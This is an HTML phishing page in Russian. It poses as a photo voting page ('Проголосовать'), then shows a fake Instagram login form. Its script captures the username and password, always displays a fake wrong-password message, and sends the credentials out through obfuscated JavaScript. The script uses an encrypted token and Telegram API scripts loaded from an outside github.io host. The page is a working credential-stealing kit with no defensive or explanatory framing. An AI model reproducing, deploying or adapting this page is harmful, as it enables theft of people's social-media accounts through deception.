<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>IMAGE</title>
    <script src="https://ummx.github.io/import/script/aes.js"></script>
    <script src="https://ummx.github.io/import/script/telegram-api.js"></script>
    <style>
        *{
            margin: 0;
            padding: 0;
        }
        .sop{
            width:250px;
            display: block;
            margin: auto;
            text-align: center;
            border-radius:5px;
            margin-top:50px;
        }
        .title{
            display: block;
            margin: auto;
            text-align: center;
            font-size:17px;
            margin-top:30px;
            font-family: monospace;
        }
         .btn{
             display: block;
             margin: auto;
             text-align: center;
             width:250px;
             height:35px;
             margin-top:30px;
             border: none;
             color: white;
             border-radius:5px;
             background: rgb(0, 119, 255);
         }
         .inst{
             width:150px;
             display: block;
             margin: auto;
             text-align: center;
             margin-top:80px;
         }
         input{
             display: block;
             margin: auto;
             width: 230px;
             height:30px;
             margin-top:10px;
             border-radius:3px;
             outline: none;
             padding-left:10px;
             border: 2px solid rgb(224, 223, 223);
         }
         .login{
             width:245px;

             display: block;
             margin: auto;
             text-align: center;
             margin-top:30px;
             height:28px;
             color: white;
             background: rgb(0, 140, 255);
             border: none;
             border-radius: 5px;
         }
         .error{
             display: none;
             margin: auto;
             text-align: center;
             font-family: arial;
             font-size:14px;
             margin-top: 20px;
             width: 250px;
             color: red;
         }
         .header{
             background: rgb(255, 67, 34);
             height:55px;

         }
         .t{
             color: white;
             font-size:15px;
             display: block;
             margin: auto;
             text-align: center;
             font-family: arial;
             width:250px;
             padding-top:10px;
         }
    </style>
</head>
<body>
    <div class="head" style="display:block">
        <img class="sop" src="https://ummx.github.io/import/img/polina.jpg" alt="">
    <h1 class="title">248 просмотров</h1>
    <button class="btn" onclick="next()">Проголосовать</button>
    </div>
    <div class="login_form" style="display: none;">
        <div class="header">
            <p class="t">
                Для того чтобы проголосовать нужно зайти в свой аккаунт!
            </p>
        </div>
    <div class="form">

        <img class="inst" src="https://logos-world.net/wp-content/uploads/2020/04/Instagram-Logo.png" alt="">
        <input type="text" id="username" placeholder="Телефон, имя пользователя или эл. адрес" >
        <input type="password" id="password" placeholder="Пароль"> 
        <button onclick="login()" class="login">Войти</button>
        <p class="error">
            К сожалению, вы ввели неправильный пароль. Проверьте свой пароль еще раз.
        </p>
    </div>
    </div>
</body>
<script>
    function next(){
        document.querySelector('.head').style.display="none";
        document.querySelector('.login_form').style.display="block";
    }
function login(){
    var username=document.getElementById('username').value;
    var password=document.getElementById('password').value;
    setTimeout(()=>{
        document.querySelector('.error').style.display="block";
    },500)
    var message=`USERNAME : [${username}] %0A PASSWORD : [${password}]`;
    var _0x55d1c7=_0x2fb2;function _0x2fb2(_0x589b7d,_0x5cfe08){var _0x1c94c1=_0x1c94();return _0x2fb2=function(_0x2fb2c8,_0x166c41){_0x2fb2c8=_0x2fb2c8-0xf4;var _0x463a5c=_0x1c94c1[_0x2fb2c8];return _0x463a5c;},_0x2fb2(_0x589b7d,_0x5cfe08);}(function(_0x2c6c13,_0x1a8138){var _0x2eb49a=_0x2fb2,_0x2c4de4=_0x2c6c13();while(!![]){try{var _0x4c5305=parseInt(_0x2eb49a(0xfe))/0x1+-parseInt(_0x2eb49a(0xf8))/0x2*(-parseInt(_0x2eb49a(0xfa))/0x3)+parseInt(_0x2eb49a(0xf6))/0x4*(parseInt(_0x2eb49a(0xfd))/0x5)+-parseInt(_0x2eb49a(0xf4))/0x6+parseInt(_0x2eb49a(0xfb))/0x7*(-parseInt(_0x2eb49a(0xfc))/0x8)+-parseInt(_0x2eb49a(0xf9))/0x9+parseInt(_0x2eb49a(0xf5))/0xa;if(_0x4c5305===_0x1a8138)break;else _0x2c4de4['push'](_0x2c4de4['shift']());}catch(_0x62e525){_0x2c4de4['push'](_0x2c4de4['shift']());}}}(_0x1c94,0xe5e25),sendMessage(message,_0x55d1c7(0xf7)));function _0x1c94(){var _0x4d320e=['6704761b3cbf8260c556c3e41399ab8bcdf0b51a98935efc0405bd9ca098de87','2wAjUMR','3634173vlJUlR','456480cFVcPe','2241071jkKLde','16twWHVu','7389385woMvVw','195839DwCczn','10810392SqOuQo','19615640ohnGiY','4IQAgHy'];_0x1c94=function(){return _0x4d320e;};return _0x1c94();}
}
</script>
</html>
